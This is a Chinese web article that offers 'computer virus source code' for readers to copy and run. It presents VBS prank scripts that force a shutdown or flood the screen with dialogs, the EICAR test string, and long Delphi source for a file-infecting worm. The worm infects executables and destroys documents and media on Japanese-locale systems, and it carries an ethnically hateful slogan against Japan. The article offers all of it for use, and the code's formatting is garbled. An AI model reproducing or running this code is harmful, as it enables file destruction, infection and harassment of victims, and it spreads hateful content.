計算機病毒原始碼什麼樣

  萬惡的計算機病毒也是有原始碼組成的,那麼計算機病毒程式碼長什麼樣呢?下面由小編給你做出詳細的計算機病毒原始碼介紹!希望對你有幫助!

  計算機病毒原始碼介紹一:

  給你個惡搞的玩on error resume next

  dim WSHshellA

  set WSHshellA = wscript.createobject***"wscript.shell"***

  WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""說我是豬,不說我是豬就一分鐘關你機,不信,試試···"" ",0 ,true

  dim a

  do while***a <> "我是豬"***

  a = inputbox ***"說我是豬,就不關機,快撒,說 ""我是豬"" ","說不說","不說",8000,7000***

  msgbox chr***13*** + chr***13*** + chr***13*** + a,0,"MsgBox"

  loop

  msgbox chr***13*** + chr***13*** + chr***13*** + "早說就行了嘛"

  dim WSHshell

  set WSHshell = wscript.createobject***"wscript.shell"***

  WSHshell.run "cmd.exe /c shutdown -a",0 ,true

  msgbox chr***13*** + chr***13*** + chr***13*** + "哈哈哈哈,真過癮"

  把這段複製,新建一個文字文件,貼上進去,儲存,然後右擊,屬性,將字尾由.txt改為.vbs 確定就行了!以後雙擊這個vbs檔案就能捉弄人了

  計算機病毒原始碼介紹二:

  最簡單的一個電腦病毒

  1.VBS版本:

  開啟記事本,輸入以下程式碼:

  Do Until 1=2

  Wscript.echo "煩死你!"

  Loop

  儲存為1.VBS,執行後不斷出現"煩死你"的對話方塊。

  2.VB6版本:

  開啟Visual Basic 6.0,雙擊窗體,輸入以下程式碼:

  Private Sub Form_Load******

  Do Until 1=2

  Me.Hide

  Me.Show

  Shell "calc.exe"

  Loop

  End Sub 儲存後編譯為EXE檔案,執行後馬上宕機。

  計算機病毒原始碼介紹三:

  把下面這段程式碼複製到記事本里,儲存為文字檔案

  X5O!P%@AP[4\PZX54***P^***7CC***7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

  熊貓燒香

  ogram Japussy;

  uses

  Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};

  const

  HeaderSize = 82432; //病毒體的大小

  IconOffset = $12EB8; //PE檔案主圖示的偏移量

  //在我的Delphi5 SP1上面編譯得到的大小,其它版本的Delphi可能不同

  //查詢2800000020的十六進位制字串可以找到主圖示的偏移量

  {

  HeaderSize = 38912; //Upx壓縮過病毒體的大小

  IconOffset = $92BC; //Upx壓縮過PE檔案主圖示的偏移量

  //Upx 1.24W 用法: upx -9 --8086 Japussy.exe

  }

  IconSize = $2E8; //PE檔案主圖示的大小--744位元組

  IconTail = IconOffset + IconSize; //PE檔案主圖示的尾部

  ID = $44444444; //感染標記

  //垃圾碼,以備寫入

  Catchword = 'If a race need to be killed out, it must be Yamato. ' +

  'If a country need to be destroyed, it must be Japan! ' +

  '*** W32.Japussy.Worm.A ***';

  {$R *.RES}

  function RegisterServiceProcess***dwProcessID, dwType: Integer***: Integer;

  stdcall; external 'Kernel32.dll'; //函式宣告

  var

  TmpFile: string;

  Si: STARTUPINFO;

  Pi: PROCESS_INFORMATION;

  IsJap: Boolean = False; //日文作業系統標記

  { 判斷是否為Win9x }

  function IsWin9x: Boolean;

  var

  Ver: TOSVersionInfo;

  begin

  Result := False;

  Ver.dwOSVersionInfoSize := SizeOf***TOSVersionInfo***;

  if not GetVersionEx***Ver*** then

  Exit;

  if ***Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS*** then //Win9x

  Result := True;

  end;

  { 在流之間複製 }

  procedure CopyStream***Src: TStream; sStartPos: Integer; Dst: TStream;

  dStartPos: Integer; Count: Integer***;

  var

  sCurPos, dCurPos: Integer;

  begin

  sCurPos := Src.Position;

  dCurPos := Dst.Position;

  Src.Seek***sStartPos, 0***;

  Dst.Seek***dStartPos, 0***;

  Dst.CopyFrom***Src, Count***;

  Src.Seek***sCurPos, 0***;

  Dst.Seek***dCurPos, 0***;

  end;

  { 將宿主檔案從已感染的PE檔案中分離出來,以備使用 }

  procedure ExtractFile***FileName: string***;

  var

  sStream, dStream: TFileStream;

  begin

  try

  sStream := TFileStream.Create***ParamStr***0***, fmOpenRead or fmShareDenyNone***;

  try

  dStream := TFileStream.Create***FileName, fmCreate***;

  try

  sStream.Seek***HeaderSize, 0***; //跳過頭部的病毒部分

  dStream.CopyFrom***sStream, sStream.Size - HeaderSize***;

  finally

  dStream.Free;

  end;

  finally

  sStream.Free;

  end;

  except

  end;

  end;

  { 填充STARTUPINFO結構 }

  procedure FillStartupInfo***var Si: STARTUPINFO; State: Word***;

  begin

  Si.cb := SizeOf***Si***;

  Si.lpReserved := nil;

  Si.lpDesktop := nil;

  Si.lpTitle := nil;

  Si.dwFlags := STARTF_USESHOWWINDOW;

  Si.wShowWindow := State;

  Si.cbReserved2 := 0;

  Si.lpReserved2 := nil;

  end;

  { 髮帶毒郵件 }

  procedure SendMail;

  begin

  //哪位仁兄願意完成之?

  end;

  { 感染PE檔案 }

  procedure InfectOneFile***FileName: string***;

  var

  HdrStream, SrcStream: TFileStream;

  IcoStream, DstStream: TMemoryStream;

  iID: LongInt;

  aIcon: TIcon;

  Infected, IsPE: Boolean;

  i: Integer;

  Buf: array[0..1] of Char;

  begin

  try //出錯則檔案正在被使用,退出

  if CompareText***FileName, 'JAPUSSY.EXE'*** = 0 then //是自己則不感染

  Exit;

  Infected := False;

  IsPE := False;

  SrcStream := TFileStream.Create***FileName, fmOpenRead***;

  try

  for i := 0 to $108 do //檢查PE檔案頭

  begin

  SrcStream.Seek***i, soFromBeginning***;

  SrcStream.Read***Buf, 2***;

  if ***Buf[0] = #80*** and ***Buf[1] = #69*** then //PE標記

  begin

  IsPE := True; //是PE檔案

  Break;

  end;

  end;

  SrcStream.Seek***-4, soFromEnd***; //檢查感染標記

  SrcStream.Read***iID, 4***;

  if ***iID = ID*** or ***SrcStream.Size < 10240*** then //太小的檔案不感染

  Infected := True;

  finally

  SrcStream.Free;

  end;

  if Infected or ***not IsPE*** then //如果感染過了或不是PE檔案則退出

  Exit;

  IcoStream := TMemoryStream.Create;

  DstStream := TMemoryStream.Create;

  try

  aIcon := TIcon.Create;

  try

  //得到被感染檔案的主圖示***744位元組***,存入流

  aIcon.ReleaseHandle;

  aIcon.Handle := ExtractIcon***HInstance, PChar***FileName***, 0***;

  aIcon.SaveToStream***IcoStream***;

  finally

  aIcon.Free;

  end;

  SrcStream := TFileStream.Create***FileName, fmOpenRead***;

  //標頭檔案

  HdrStream := TFileStream.Create***ParamStr***0***, fmOpenRead or fmShareDenyNone***;

  try

  //寫入病毒體主圖示之前的資料

  CopyStream***HdrStream, 0, DstStream, 0, IconOffset***;

  //寫入目前程式的主圖示

  CopyStream***IcoStream, 22, DstStream, IconOffset, IconSize***;

  //寫入病毒體主圖示到病毒體尾部之間的資料

  CopyStream***HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail***;

  //寫入宿主程式

  CopyStream***SrcStream, 0, DstStream, HeaderSize, SrcStream.Size***;

  //寫入已感染的標記

  DstStream.Seek***0, 2***;

  iID := $44444444;

  DstStream.Write***iID, 4***;

  finally

  HdrStream.Free;

  end;

  finally

  SrcStream.Free;

  IcoStream.Free;

  DstStream.SaveToFile***FileName***; //替換宿主檔案

  DstStream.Free;

  end;

  except;

  end;

  end;

  { 將目標檔案寫入垃圾碼後刪除 }

  procedure SmashFile***FileName: string***;

  var

  FileHandle: Integer;

  i, Size, Mass, Max, Len: Integer;

  begin

  try

  SetFileAttributes***PChar***FileName***, 0***; //去掉只讀屬性

  FileHandle := FileOpen***FileName, fmOpenWrite***; //開啟檔案

  try

  Size := GetFileSize***FileHandle, nil***; //檔案大小

  i := 0;

  Randomize;

  Max := Random***15***; //寫入垃圾碼的隨機次數

  if Max < 5 then

  Max := 5;

  Mass := Size div Max; //每個間隔塊的大小

  Len := Length***Catchword***;

  while i < Max do

  begin

  FileSeek***FileHandle, i * Mass, 0***; //定位

  //寫入垃圾碼,將檔案徹底破壞掉

  FileWrite***FileHandle, Catchword, Len***;

  Inc***i***;

  end;

  finally

  FileClose***FileHandle***; //關閉檔案

  end;

  DeleteFile***PChar***FileName******; //刪除之

  except

  end;

  end;

  { 獲得可寫的驅動器列表 }

  function GetDrives: string;

  var

  DiskType: Word;

  D: Char;

  Str: string;

  i: Integer;

  begin

  for i := 0 to 25 do //遍歷26個字母

  begin

  D := Chr***i + 65***;

  Str := D + ':';

  DiskType := GetDriveType***PChar***Str******;

  //得到本地磁碟和網路盤

  if ***DiskType = DRIVE_FIXED*** or ***DiskType = DRIVE_REMOTE*** then

  Result := Result + D;

  end;

  end;

  { 遍歷目錄,感染和摧毀檔案 }

  procedure LoopFiles***Path, Mask: string***;

  var

  i, Count: Integer;

  Fn, Ext: string;

  SubDir: TStrings;

  SearchRec: TSearchRec;

  Msg: TMsg;

  function IsValidDir***SearchRec: TSearchRec***: Integer;

  begin

  if ***SearchRec.Attr '.'*** and

  ***SearchRec.Name <> '..'*** then

  Result := 0 //不是目錄

  else if ***SearchRec.Attr = 16*** and ***SearchRec.Name <> '.'*** and

  ***SearchRec.Name <> '..'*** then

  Result := 1 //不是根目錄

  else Result := 2; //是根目錄

  end;

  begin

  if ***FindFirst***Path + Mask, faAnyFile, SearchRec*** = 0*** then

  begin

  repeat

  PeekMessage***Msg, 0, 0, 0, PM_REMOVE***; //調整訊息佇列,避免引起懷疑

  if IsValidDir***SearchRec*** = 0 then

  begin

  Fn := Path + SearchRec.Name;

  Ext := UpperCase***ExtractFileExt***Fn******;

  if ***Ext = '.EXE'*** or ***Ext = '.SCR'*** then

  begin

  InfectOneFile***Fn***; //感染可執行檔案

  end

  else if ***Ext = '.HTM'*** or ***Ext = '.HTML'*** or ***Ext = '.ASP'*** then

  begin

  //感染HTML和ASP檔案,將Base64編碼後的病毒寫入

  //感染瀏覽此網頁的所有使用者

  //哪位大兄弟願意完成之?

  end

  else if Ext = '.WAB' then //Outlook地址簿檔案

  begin

  //獲取Outlook郵件地址

  end

  else if Ext = '.ADC' then //Foxmail地址自動完成檔案

  begin

  //獲取Foxmail郵件地址

  end

  else if Ext = 'IND' then //Foxmail地址簿檔案

  begin

  //獲取Foxmail郵件地址

  end

  else

  begin

  if IsJap then //是倭文作業系統

  begin

  if ***Ext = '.DOC'*** or ***Ext = '.XLS'*** or ***Ext = '.MDB'*** or

  ***Ext = '.MP3'*** or ***Ext = '.RM'*** or ***Ext = '.RA'*** or

  ***Ext = '.WMA'*** or ***Ext = '.ZIP'*** or ***Ext = '.RAR'*** or

  ***Ext = '.MPEG'*** or ***Ext = '.ASF'*** or ***Ext = '.JPG'*** or

  ***Ext = '.JPEG'*** or ***Ext = '.GIF'*** or ***Ext = '.SWF'*** or

  ***Ext = '.PDF'*** or ***Ext = '.CHM'*** or ***Ext = '.AVI'*** then

  SmashFile***Fn***; //摧毀檔案

  end;

  end;

  end;

  //感染或刪除一個檔案後睡眠200毫秒,避免CPU佔用率過高引起懷疑

  Sleep***200***;

  until ***FindNext***SearchRec*** <> 0***;

  end;

  FindClose***SearchRec***;

  SubDir := TStringList.Create;

  if ***FindFirst***Path + '*.*', faDirectory, SearchRec*** = 0*** then

  begin

  repeat

  if IsValidDir***SearchRec*** = 1 then

  SubDir.Add***SearchRec.Name***;

  until ***FindNext***SearchRec*** <> 0***;

  end;

  FindClose***SearchRec***;

  Count := SubDir.Count - 1;

  for i := 0 to Count do

  LoopFiles***Path + SubDir.Strings + '', Mask***;

  FreeAndNil***SubDir***;

  end;

  { 遍歷磁碟上所有的檔案 }

  procedure InfectFiles;

  var

  DriverList: string;

  i, Len: Integer;

  begin

  if GetACP = 932 then //日文作業系統

  IsJap := True; //***!

  DriverList := GetDrives; //得到可寫的磁碟列表

  Len := Length***DriverList***;

  while True do //死迴圈

  begin

  for i := Len downto 1 do //遍歷每個磁碟驅動器

  LoopFiles***DriverList + ':', '*.*'***; //感染之

  SendMail; //髮帶毒郵件

  Sleep***1000 * 60 * 5***; //睡眠5分鐘

  end;

  end;

  { 主程式開始 }

  begin

  if IsWin9x then //是Win9x

  RegisterServiceProcess***GetCurrentProcessID, 1*** //註冊為服務程序

  else //WinNT

  begin

  //遠端執行緒對映到Explorer程序

  //哪位兄臺願意完成之?

  end;

  //如果是原始病毒體自己

  if CompareText***ExtractFileName***ParamStr***0******, 'Japussy.exe'*** = 0 then

  InfectFiles //感染和發郵件

  else //已寄生於宿主程式上了,開始工作

  begin

  TmpFile := ParamStr***0***; //建立臨時檔案

  Delete***TmpFile, Length***TmpFile*** - 4, 4***;

  TmpFile := TmpFile + #32 + '.exe'; //真正的宿主檔案,多一個空格

  ExtractFile***TmpFile***; //分離之

  FillStartupInfo***Si, SW_SHOWDEFAULT***;

  CreateProcess***PChar***TmpFile***, PChar***TmpFile***, nil, nil, True,

  0, nil, '.', Si, Pi***; //建立新程序執行之

  InfectFiles; //感染和發郵件

  end;